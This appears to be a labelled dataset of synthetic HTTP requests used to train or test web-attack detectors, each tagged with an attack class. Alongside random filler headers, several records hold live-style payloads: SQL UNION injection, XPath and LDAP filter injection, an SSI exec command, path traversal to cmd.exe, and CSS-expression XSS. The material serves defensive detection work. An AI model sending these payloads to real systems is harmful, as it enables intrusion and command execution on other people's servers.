Referer: http://tIbtdaE.st/ohn8n7pj/aatrlng/ern8snY.ace
User-Agent: Mozilla/6.5 (X11; U; Linux i586 2.4; eR-oe; rv:3.3.0) Gecko/31284721
UA-CPU: Sparc
Via: 5.6 www.cjrsa.shtml, 9.2 www.kTHtun.css:48
----: -------------------------------------------------

null

End - Id: 36873
Start - Id: 36900
class: LdapInjection
GET /htilZ7cKp5GxRsZ7I/wc2e6hDeedrecc/hbtaPeiyeiAtl.pl?af=uial%27aodb97neeconnecto&l7s2oRh=158080&4C7X=putqdrwwsro HTTP/1.1
Host: www.wdaoadyi.fr:46452
Connection: rdwleii
Accept-Encoding: *
Accept-Language: *;q=0.4
Client-ip: 55.108.201.220
Cookie: NautoexecHVCNX=8;08havingQEE4=rfL;t73D2F=4426)(&(objectClass=oti)(|(sn    =    fnor)(cn=gd7     J*))
Date: Mon, 30 Jun 08 03:43:53 UTC
If-Modified-Since: Tue, 13 May 08 21:41:30 UTC
If-Match: "8wKh.2EHn.Eb7-omJWD"
Max-Forwards: 955
Proxy-Authorization: Basic d2MyeWhkZTpEYXNIc2E=
Authorization: Digest uri=/ietheh/eaeeotl/7reneeh8/uD178Do/hrnfouer.exe
Referer: http://dr2a6c.net/aeeiif.zip
TE: chunked;q=0.9,trailers,gzip
User-Agent: 0EfwfBFO http://www.femH0ca.org
Via: 2.0 178.0.36.83:01, 1.8 168.246.239.214, HTTP/0.5 60.42.10.217:64717

null

End - Id: 36900
Start - Id: 48923
class: XPathInjection
GET /skdb0/kertuautphg/haslejm0tiefurn/taDlySxrDir/quHxiIQIAKPBGc4/nepUi.asmx?xuAeTa2=unid+i%2BrtnrSeval&j.JnusrhFxHFT9=4&r1=niTN4wTC5&aboseeamhagsL3E=eienn&htoaiaed7m3oae=k%26Iidn+coauniontttnue&idBnetcaty3nkobject=cct%27+or+++oca9%2Fhrms%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D5%5D++++or++++%27aephSe%27+%3D+++%27 HTTP/1.1
Host: 174.61.154.175
Connection: senokny
Accept: */*
Accept-Charset: euc-cn, iso-8859-6, x-mac-greek;q=0.1, iso-8859-9, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=72
Client-ip: 187.187.151.241
Cookie: N1n@Ve=6482081;tf5wd=ouwsvo
Cookie2: $Version="7"
Date: Thu, 29 Jan 09 22:25:27 CET
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "LAHK2WdNQcm60qvLzQG9"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 8
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: http://ttl9zss.com/sscmta9/wehre/hidw/9yEp.js
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Host
User-Agent: enIbaj
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: deflate
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48923
Start - Id: 39268
class: SSI
GET /gsQjFSeP0xXe_eC/eLnB7sCTTb3B/tJtCDJ/oalau1perLpaea/sMCMEkuCHzzXrmr/tJGXV1.hv1iGgG5M/lqX5Frt.pl?veldso6skssDjte=01293&ajzeror7mhAieh=0604&eErt=or0hhhemxEff&3Tyet=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&kyscfes=+iciim%25cc+F3&4tmpN-ctKsmYinputv=ato%40Cn&rri=0921734009&zbx=seu8&iexnooepi=Tt0fiai7ns&aoede=820 HTTP/1.0
Host: www.sO8o.uk:80
Connection: pacbe
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 128.247.28.202
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Sat, 25 Mar 06 16:32:48 CET
ETag: W/"9-rc_VTbp3Y9zuJ3"
Expect: aaf8=sGn0Eoi;tn7siqso=h1poj
From: erhT@noAtt.uk
If-Modified-Since: Wed, 04 Aug 04 21:58:11 GMT
If-Unmodified-Since: Thu, 11 Nov 04 22:47:46 CET
If-Match: *
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: *
Max-Forwards: 7526
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Basic b2lvcjpmcnRo
Range: 864-,5323-,-8736
Referer: /aildd/2tDo/nbydaese.cgi
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 2.4; ii-li; rv:8.6.6) Gecko/93416462
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 3.8 131.100.124.150, 7.9 www.sA1j.shtml
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39268
Start - Id: 35471
class: XPathInjection
GET /nN/37/iQTouYWvC1/onii/dpittu/opv@_wDVn-/nGAwqmd38S/D6o03I.aY9rnUf/dqVRdFMz@3lfe.png? HTTP/1.1
Host: www.ee7a7.it
Connection: aDT8to
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=44
Client-ip: 59.239.90.47
Cookie: ttiia=n6t 1asi
Cookie2: $Version="6"
Date: Thu, 11 Mar 10 01:25:03 GMT
ETag: "dFInZO7AAV.iTnAMyce"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Fri, 26 Jun 09 06:45:48 CET
If-Unmodified-Since: Thu, 03 Mar 05 15:59:10 UTC
If-Match: "OKAsHDeFY4@.W@Zy"
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: Sun, 28 Mar 04 04:42:40 UTC
Max-Forwards: 9
MIME-Version: 9.6
Pragma: sifA='92ie'
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: Basic ODkzbW5hdDpldnFzYWM=
Range: -3871,41-303,8-768822
Referer: /sOdsvi.rar
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: teeatln'  or   1<     ioieet/t/9ir/child::text()[position()=85]  or    'ljnkade'  =    '
UA-CPU: StrongARM
UA-Disp: 8678,966,8
Via: 1.8 www.sestsrgn.css, 9.1 143.209.36.110
Transfer-Encoding: compress
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 121.242.149.148

null

End - Id: 35471
Start - Id: 35591
class: XPathInjection
GET /onlc0EaarlEzirll/ViK1@iGZOU/SOlfdrop4Tx1w1/uealh3spha/tnu2xu1.asmx?_HO4_WpQxWbF=eTai%5C%29isIn%5Besa7&r2nLtltey=a0mn%27+++or++6++++%3C++++count%28path%2Fchild%3A%3A*%29++or+++%27dt6nw%27%3D++++%27&ttaaeHIodtdyon=Rit HTTP/1.1
Host: 183.167.42.0:416
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 146.199.243.126
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="4"
Date: Sun, 25 Mar 07 06:57:11 UTC
ETag: W/"lcch2z22_L8yP9hkCD"
Expect: atlide=oHonl
From: keef8S@qicoiNe.be
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Wed, 07 May 08 20:46:29 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "ROUscR3pkmOD.leDa"
If-Range: *
Max-Forwards: 76
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Digest algorithm=MD5-sess
Range: 1278-6
Referer: http://www.Ravi.it/raapM/opid.htm
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (compatible; ffsp2oaeko; Win98; fn9eW)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 468x391
Via: FTP/0.9 211.51.240.176, HTTP/9.8 5.202.57.232, 3.5 128.216.105.127
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35591
Start - Id: 35398
class: SqlInjection
GET /fP9i3WngW1X33g/egXgItneXlJRsIkl/2QDMpidqk/aXuhfhrtsq1eedndt.php?.TZK5PQidocumentc=u8lhoaReosort&ryPLn9OaYoC=290&iJwsrIfablet=gMq_SU8P.DX&en0bcv=8508&loP=389628287&i1aUSmutRAle=la8n&s5nOwndTnt=n6T%29&ktT=etcm+ep%3Ac+eiI&rofeuittashli=%27%29++UNION+++++ALL+++++SELECT++++01++++FROM++++oNr2t+WHERE++%28+%27%27%3D++%27&h3my=hkIcXWin&1winntrboot.iniNtzJ5W=962&i7=rilinkawylfromotng HTTP/1.0
Host: 73.151.136.173
Connection: Neenoh
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress;q=0.3, compress, gzip
Accept-Language: aRRetr-ueSi, n-c40ti;q=0.2, eve-nOnGioa;q=0.3, avsnb-exAmeka;q=0.7, q-N
Cache-Control: max-age=9
Client-ip: 27.88.177.131
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="091"
Date: Thu, 29 Sep 05 24:19:36 CET
ETag: "w.bssa@znOLYSv9"
Expect: mtrhAh
From: raeiOige@2salo.it
If-Modified-Since: Fri, 22 Jan 10 23:08:15 CET
If-Unmodified-Since: Thu, 11 May 06 05:38:56 CET
If-Match: *
If-None-Match: "xRi8ZP-96e1q4YBs8jZ"
If-Range: "eThxOE6__VlUODNhXZC"
Max-Forwards: 05
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: Basic aUEzb3BhcjpUZWN0M2U=
Range: 24492-281270
Referer: http://tladsq.cz/knsIr/w8dep.cfm
TE: trailers,trailers
Trailer: Pragma
User-Agent: 4g8oeix47u/8.6
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 177x860
Via: 7.9 155.11.91.69:9235, FTP/1.6 www.thpzsDe.jpeg:7
Transfer-Encoding: zsrg; eekne=uNvccIa
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35398
Start - Id: 44275
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 98.211.155.84
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: nhrme-bg8
Cache-Control: min-fresh=54
Client-ip: 192.246.21.91
Cookie: ecoeHj1meanixs=2sOitahdqnmsSgu;rreeobNf=fabpl;vlaoeasifrNtliY=2386;nye=117064666;efod=nhmE90;i7co=61407809
Cookie2: $Version="915"
Date: Tue, 10 May 05 05:02:25 CET
ETag: "RlEOHw4WT-OI.q1H"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Wed, 27 Feb 08 06:28:43 CET
If-Match: "fX3vv9nhjLUGEf3"
If-None-Match: *
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 8560
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: /teoto/nieic/eWEtlley/rmRtht.swf
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: yteolf/9.3
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: FTP/5.4 www.Ilntr.jpeg, 1.7 38.186.221.77
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44275
Start - Id: 37805
class: LdapInjection
GET /tIji1.y-hYPJB/r4q.exe?fxlne=227022128&W325RiframeGi=escriptu&ueilhReih8alTsf=8627%29%28%26%28objectClass%3Ddti%29%28%7C%28sn++++%3D++++toe%29%28cn%3Dhe++++J*%29%29&bts3=9&sql7nhkiAcaw=8061259&BYr4iinsert3k=5806801&iniownhosao=ieia0%25+x%5Bda2dptaym&EXLIDY1servicesdocumente=9r0s HTTP/1.1
Host: 54.169.160.202:5474
Connection: close
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 148.220.0.143
Cookie: gospa=77696541;oi1rnO6s=pet31lNiuitfnf;7LnS9nodleaaaac=11769846;i6rEevlBvhee=3naperltbodyhconnecthsSnnullestdinelsf;5uwtar=rL2FU-3brCk;2-J6=h6OvoHTcv-07
Cookie2: $Version="22"
Date: Wed, 29 Jun 05 09:53:39 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Wed, 24 Feb 10 10:15:45 CET
If-Match: "Zb0wf2BeHixBzcF"
If-None-Match: "hW.fIAZfKoFn4SpC6LX"
If-Range: *
Max-Forwards: 534
MIME-Version: 2.1
Pragma: riC=erS9aa
Proxy-Authorization: nres 8iga8qk=JHmer
Authorization: NTLM Y3NzNnJseDVzb2VrZGVhbXQ5YXRtdXQ5YWVxcnN0MXZpYXQ=
Range: -1,56487-
Referer: /twutr93/dDAlfns/bye9ttec.asp
TE: gzip,gzip;q=0.6,gzip
Trailer: Expect
User-Agent: Mozilla/9.3 (compatible; Konqueror/3.4; SunOS sun4u; oqhoeda; lltidtbqod)
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: leeel/1.3 112.88.25.120, 5.5 www.bbronh.htm, FTP/3.2 57.113.59.241
Transfer-Encoding: 8zaol; dgrb=nsttr18
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37805
Start - Id: 49563
class: XPathInjection
GET /Tz0_idVG.XttbcatO/ey9k3GuxCrEcN@5/earm/7idsq/EnZnuez/2UfeegbEnts0qreh.dll?cus=aa+amahhome%27k%5Deh+tom&dret0Htzo=ye%26del2ce&rhePesdALeue=iboot.ini%5Dt%3Ftelnetaerlteo%3Bhti&o2eoyeh6=fajhox%27+++or++%28i++++%3C++count%28vyrEpi%2Fchild%3A%3Atext%28%29%29+++and++++j+++%3C+++count%28thewe%2Fchild%3A%3Acomment%28%29%29+++++and++k+%3C++count%28ylbr%2Fchild%3A%3A*%29++++%29+++or++%27nstakgap%27++%3D%27+++oestosfr%27+++or HTTP/1.0
Host: 206.190.209.243:80
Connection: keep-alive
Accept: text/plain
Accept-Charset: windows-874;q=0.4, iso-8859-2, us-ascii, windows-1257
Accept-Encoding: *
Accept-Language: kdseo-mss0naiA, od-xuKsnm;q=0.2, 4-T, hoooseo-slHi;q=0.2
Cache-Control: only-if-cached
Client-ip: 69.118.218.13
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="67"
Date: Tue, 14 Jul 09 22:50:48 UTC
ETag: "1XNKuhfoY0xpvjB27"
Expect: 100-continue
From: no50tll@eaFr3e.cz
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 19 Jan 05 07:41:43 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: *
If-Range: Mon, 21 Jun 04 11:44:36 UTC
Max-Forwards: 66
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: NTLM aGp5aGhvYXQzbHphZm5jYWVuZW9vcmlsNnRKaXNpc3RlZWFhaXJFcmVtaWhz
Range: 8-,588-
Referer: /0eeI/dorep/egstto.asp
TE: gzip,gzip;q=0.6
Trailer: TE
User-Agent: h0tk6Nal (nxdco1U@; nUAvyBX; tT51AW9)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: 6.1 50.42.214.188, HTTP/5.5 www.ogmz.htm, 8.6 www.d85meij.html:28
Transfer-Encoding: 0fen
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49563
Start - Id: 40238
class: SSI
GET /cK.xyvDP6xWKXX/xk0l@xThNtUJvlYmG@@t/tWRX0PTBpOA/uifcMvmVjPVBEirs/Sod.RBJJyFqcopyin/BdhttpsX-ChsgQ3Ba.exe?oectdnzl=lqr3Hs&dteW39ixs9u=thtpassro+ HTTP/1.0
Host: 104.1.170.108:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=06
Cookie: hhIbtmpQ=<!--#exec   cmd="c:\progra~1\h6ewehrAgs\yr6hl\jyni.exe    d:\sehtewd1l\www.veroinroet.org\anoe6\database.mdb  /x exporttofoxpro"-->
Cookie2: $Version="1"
Date: Sun, 08 Feb 09 11:17:48 GMT
ETag: ".eBfmCL.9TB7D.4B6OT"
If-Modified-Since: Wed, 07 Feb 07 10:10:57 UTC
If-Unmodified-Since: Mon, 24 Dec 07 08:18:32 UTC
If-Match: "iExmLG1tM03LDRY"
If-Range: Thu, 04 Mar 10 03:32:30 UTC
Max-Forwards: 1
MIME-Version: 6.6
Pragma: cwo=vtr
Proxy-Authorization: Basic dnB0cnRkb2U6YWViZTRFMnQ=
Authorization: NTLM bnRoZUFTYW5vdXNhcmtlaXQ3YWJ0Znlmb2U2aHVoc2plNnNlaTJkOG42YWg=
Referer: http://feoelest.cz/0bonx/9ltvree/kecU6/duee6ine.png
TE: gzip,gzip
Trailer: If-Range
User-Agent: nPthuethN/2.4.8.1.3
UA-Disp: 2564,0852,8
UA-OS: Win9x
Via: 6.2 108.69.244.173:74925, 5.4 www.2f4eeo.css
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40238
Start - Id: 36935
class: LdapInjection
POST /ikA1Lht6Uj95s7sXCx3/blL6O/1hmh/s6nuRtD.uJBP-4A@/nbehUnonrhefreefx/edsoeusltEtsfnaAejr/0Rxnigteotrtuaaatbi/servicesbr2vP_ofJIfromz9G/Wj@OeNEU/mhuJ8wRdl.jpg? HTTP/1.0
Content-Length: 368
Content-Language: 5rretnad,t
Content-Encoding: compress
Content-Location: /rneentva/tteaeu/gabnn/edirt.gz
Content-MD5: bGVkdWVyN2xwYXJkZm1jbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Dec 04 17:09:55 GMT
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 242.52.147.193:26
Connection: httoam
Accept: application/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: aaienoe-tve, cSo-l, e6u-ea;q=0.6, tn5t-pidnsaw, 8ei-p;q=0.8
Cache-Control: max-stale=00
Client-ip: 21.9.187.173
Cookie: 9mstr98jTnodmdr=nKat rcpO;zuf4wny5gBpepy=?3Sinh;rahirpsrulqset=5347749;EWBA1QxUxJv=9s;8ttsaw5rei=089
Cookie2: $Version="1"
Date: Wed, 05 May 10 10:00:52 UTC
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Fri, 13 Aug 04 23:34:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: letuea twhinkhx=ohaif
Range: 21-,49196-
Referer: /nt4g/haHes/PsrLtHi/tvemo.cgi
TE: chunked,trailers
Trailer: Accept
User-Agent: hQpssewwsh
UA-CPU: PowerPC
UA-Disp: 6303,0091,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~

3r=354501869&vti=ax0wh&ogsrgsh8tk=t&nCmnhtotr=38159058&SautoexecTgpwdropwIE=)    (    |   (displayName=had*) (name = had*  )(mail=had*  )&en9pprsfoai=384225&ntea=71421&tmmtk=touihaOc&mrm1lqZdocumentdeletec=r@hg&Nhht8E=9846&htaccesMinputEoisystemN-SN=n3&EnGnbhtoraopEk=9&esAZsloeih=na&eaqs)7ogroup by'mwtshk&b7ie4iomvoTdt=ia\tmp&sora=9

End - Id: 36935
Start - Id: 47988
class: XSS
GET /ApsxinJgpUmochashutdown090qb/an24iXSZEL8R6juMnrYo/erLiy/nU7@position9access_logUPH/xabe.sh?1iFEquq-=55119179&sanolmlsRhuD=ryTnaooM5e4o&9p=t++style%3Dleft%3Aexpression%28alert+%28NqD.rsfdt%29%29&ayIvm4nuen=ent1hYvkY HTTP/1.0
Host: 8.55.245.105:80
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.4, cp-950, iso-8859-2, iso-8859-8, x-mac-arabic
Accept-Encoding: *
Accept-Language: h-0t, oli-oai;q=0.7
Cache-Control: only-if-cached
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="47"
Date: Sat, 14 Apr 07 23:51:23 CET
ETag: W/"3pne6ni6DpyrVuHOaA"
Expect: ssgt
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 26 Jan 10 13:17:37 CET
If-Unmodified-Since: Thu, 27 Nov 08 02:25:55 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jan 09 08:48:53 GMT
Max-Forwards: 2
MIME-Version: 1.7
Pragma: 2eEsr=ifwUf
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic cTBzbzpoaW9scw==
Range: 2-,-873,110-95038
Referer: /aa9cagE/iy65rve.pl
TE: trailers,gzip
Trailer: User-Agent
User-Agent: redeye (qWTC04KQ)
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/3.6 www.tuinb.html
Transfer-Encoding: deflate
Upgrade: ram/6.4, IrrLes/3.6, aomon/6.0
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47988
Start - Id: 49137
class: XPathInjection
GET /XDPEFoFb/r_4/bViTSWjDBNHq4QAeJ/ctnt/7a.l_xgR8O/tIRrjdt53F4Kpfe@Tc/VxaRAOeehi6i/ti8oshi14nr8e1rlac8l/echoPiformNj.MimgTx56havingH/-D0s1/admin5processing-instruction/Axnprocessing-instructionzchildmaillErmlibxxm.asp?Edim=feallaovenl2dxio&GhG7=17&tFr=27326&s2ylr=pnbkh%7Esi&Ehdat8mouyird=ckn%27+++++or+++++E%2Fst%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D32%5D+++or++%27suna80ib%27++%3D++%27&gjlvY60BDV=u-JcS494d HTTP/1.0
Host: 117.245.145.48
Connection: tEocsd
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nA-iu;q=0.8
Cache-Control: no-cache
Client-ip: 97.222.173.73
Cookie: gtppCiccedpc=1568642099;F0omZqh=bina>accepter\o
Cookie2: $Version="860"
Date: Tue, 14 Apr 09 21:01:08 GMT
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Thu, 04 Mar 04 12:55:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: E11su gdAiio=W96tf0
Authorization: NTLM b2Jhc0RkQ3FlZHNuZWltZW50b2V0b2xvbjdlVG40ZXRzcnQ=
Range: 6-
Referer: /zygd.gz
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/6.7 (Windows; U; Win 9x 4.8; ig-na; rv:7.6.0) Gecko/42660321
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: HTTP/3.3 130.157.114.54, 4.7 www.eou5naU5.tiff:5411, 5.4 www.etneprt.tiff
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49137
Start - Id: 36914
class: LdapInjection
POST /iaAehtpactHpjjo/lYa_yLu/nwLgKar53o0l6pJZp/h7i/odu9/shxNbs2sik3/a5v/rr/dRn5ts6ydecsnamBa2.css? HTTP/1.1
Content-Length: 112
Content-Language: esEtSadk,oe9Mklr
Content-Encoding: gzip
Content-Location: /ibcahpe/bode.nsf
Content-MD5: Y2k5YWxiYXBsYmhlaTl0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 04 08:10:12 CET
Last-Modified: Thu, 28 May 09 17:28:01 CET
Host: www.isegap.ch:80
Connection: close
Accept: */*
Accept-Charset: windows-1252, x-mac-korean;q=0.7, windows-1253;q=0.0, euc-cn, ks_c_5601-1987;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 46.117.86.31
Cookie: ujYbKx=kqho 
Cookie2: $Version="09"
Date: Mon, 21 Dec 09 16:22:33 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: t7eiih=1zBcuhe;elVew
From: dhafadn@folsiatle.com
If-Modified-Since: Sat, 02 Jun 07 13:34:42 CET
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: *
If-None-Match: "WiPAMLVUgDZFtsCu7"
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 645
MIME-Version: 8.8
Pragma: inrrrkeh='e'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest username="snspsns"
Range: 03-
Referer: /tbem/irOts/Inuo/ianihua.php4
TE: trailers,gzip;q=0.5
Trailer: Warning
